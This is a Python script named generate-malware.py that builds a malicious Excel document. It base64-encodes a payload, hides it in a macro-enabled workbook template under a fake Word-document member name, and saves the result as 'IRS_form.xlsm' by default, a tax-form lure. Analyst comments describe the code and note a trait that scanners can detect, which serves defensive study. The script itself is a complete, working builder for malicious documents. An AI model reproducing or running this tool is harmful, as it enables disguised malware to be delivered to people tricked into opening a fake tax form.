generate-malware.py
#!/usr/bin/env python
import os
import zipfile
import optparse
import base64
import tempfile
import random
import shutil
def insert_payload(zipname, filename, payload):
    """Replace one member of a ZIP archive with the contents of a file.

    The archive at ``zipname`` is rebuilt through a temporary file created in
    the same directory, skipping any member named ``filename``. The bytes
    read from ``payload`` are then appended under that name with deflate
    compression.

    Returns False when ``zipname`` is None or is not an existing file, and
    True once the member has been written.

    Analyst note: main() in this file calls this with the member name
    ``xl/embeddings/Microsoft_Word_Document2.docx`` and a base64 text file,
    so the resulting part has a .docx name but is not an OOXML/ZIP
    container. That name/content mismatch is something a static scanner of
    Office documents can check for.
    """
    if zipname is None or not os.path.isfile(zipname):
        return False

    # Scratch file is created beside the archive (presumably so the rename
    # below stays on one filesystem).
    handle, scratch_path = tempfile.mkstemp(dir=os.path.dirname(zipname))
    os.close(handle)

    # Copy every entry except the one being replaced; the original ZipInfo
    # object is passed through, and the archive comment is carried over.
    with zipfile.ZipFile(zipname, 'r') as source, \
            zipfile.ZipFile(scratch_path, 'w') as rebuilt:
        rebuilt.comment = source.comment
        for entry in source.infolist():
            if entry.filename == filename:
                continue
            rebuilt.writestr(entry, source.read(entry.filename))

    # Swap the rebuilt archive into place. This is remove-then-rename, not
    # an atomic replace.
    os.remove(zipname)
    os.rename(scratch_path, zipname)

    # Append the new content under the requested member name.
    with zipfile.ZipFile(zipname, mode='a',
                         compression=zipfile.ZIP_DEFLATED) as archive:
        with open(payload, "rb") as blob:
            replacement = blob.read()
            archive.writestr(filename, replacement)
    return True
def convert_payload(payload, folder):
    """Write a base64-encoded copy of ``payload`` to ``<folder>/payload.tmp``.

    Returns the path of the encoded file, or None when ``payload`` is None
    or does not name an existing file. The input is read into memory in one
    piece.

    Analyst note: the output is a single run of standard-alphabet base64
    with no line breaks, which is what ends up inside the generated
    document. Nothing here removes payload.tmp afterwards.
    """
    # The destination path is computed before the checks, as in the original.
    encoded_path = os.path.join(folder, "payload.tmp")
    if payload is None or not os.path.isfile(payload):
        return None

    with open(payload, "rb") as raw:
        encoded = base64.b64encode(raw.read())
    with open(encoded_path, "wb") as sink:
        sink.write(encoded)
    return encoded_path
def main():
    """Command-line entry point: embed an encoded file into a copy of an .xlsm template.

    Options (optparse):
      -p/--payload   file to embed (no default)
      -t/--template  workbook to copy, default "template-doc/Workbook1.xlsm"
      -o/--output    output file name, default "IRS_form.xlsm"

    Prints progress to stdout and returns None on every path.

    Analyst notes, from what this function does:
      * A directory named "temp.<random float>" is created in the current
        working directory and never removed. It holds payload.tmp and the
        output workbook.
      * The embedded part is always
        "xl/embeddings/Microsoft_Word_Document2.docx", and its content is
        base64 text rather than a Word document.
      * How the template consumes that part is not shown in this file.
    """
    cli = optparse.OptionParser()
    cli.add_option('-p', '--payload',
                   dest="payload_filename", default=None)
    cli.add_option('-t', '--template',
                   dest="template_filename",
                   default="template-doc/Workbook1.xlsm")
    cli.add_option('-o', '--output',
                   dest="output_filename", default="IRS_form.xlsm")
    opts, _positional = cli.parse_args()
    print opts.template_filename

    # Working directory, relative to the current directory. random.random()
    # only makes the name vary; it is not a secure temp-dir mechanism.
    work_dir = "temp." + str(random.random())
    os.makedirs(work_dir)

    encoded_payload = convert_payload(opts.payload_filename, work_dir)
    if encoded_payload is None:
        print "Error: Payload is invalid"
        return
    if not os.path.isfile(encoded_payload):
        print "Error: Payload is not a file"
        return
    print encoded_payload

    # Work on a copy so the template itself is left unmodified.
    output_file = os.path.join(work_dir, opts.output_filename)
    shutil.copyfile(opts.template_filename, output_file)

    embedded_part = "xl/embeddings/Microsoft_Word_Document2.docx"
    if not insert_payload(output_file, embedded_part, encoded_payload):
        print "Failed"
        return
    print "Successful"
    print "Saved as %s" % output_file
# Run the builder only when this file is executed as a script, so importing
# the module has no side effects.
if __name__ == '__main__':
    main()